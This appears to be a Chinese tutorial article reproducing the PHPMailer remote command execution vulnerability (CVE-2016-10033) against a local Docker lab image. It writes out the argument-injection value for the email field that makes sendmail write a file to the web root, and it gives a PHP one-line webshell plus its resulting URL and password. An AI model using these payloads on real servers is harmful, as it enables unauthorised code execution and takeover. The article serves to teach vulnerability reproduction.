温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

PHPMailer中怎么复现远程命令执行漏洞

发布时间:2021-06-30 14:57:10 来源:亿速云 阅读:412 作者:Leah 栏目:安全技术

PHPMailer中怎么复现远程命令执行漏洞,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。

一、漏洞简介

PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。

PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。

二、影响版本:

PHPMailer<5.2.18

三、漏洞复现

Docker环境:

dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033

拉去镜像启动环境:

PHPMailer中怎么复现远程命令执行漏洞

http://192.168.1.107:8080/

http://192.168.1.107:8080/在name处随便输入比如“aaa”,在email处输入:"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message处输入一句话木马:<?php@eval($_POST['thelostworld']);?>

PHPMailer中怎么复现远程命令执行漏洞

上传完一句话木马后,页面会响应3-5分钟,响应时间较长

PHPMailer中怎么复现远程命令执行漏洞

木马地址:http://192.168.1.107:8080/a.php 密码:thelostworld

PHPMailer中怎么复现远程命令执行漏洞

虚拟终端:

PHPMailer中怎么复现远程命令执行漏洞

使用脚本:

获取脚本后台回复“PHPMailer”获取脚本

PHPMailer中怎么复现远程命令执行漏洞

看完上述内容,你们掌握PHPMailer中怎么复现远程命令执行漏洞的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注亿速云行业资讯频道,感谢各位的阅读!

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI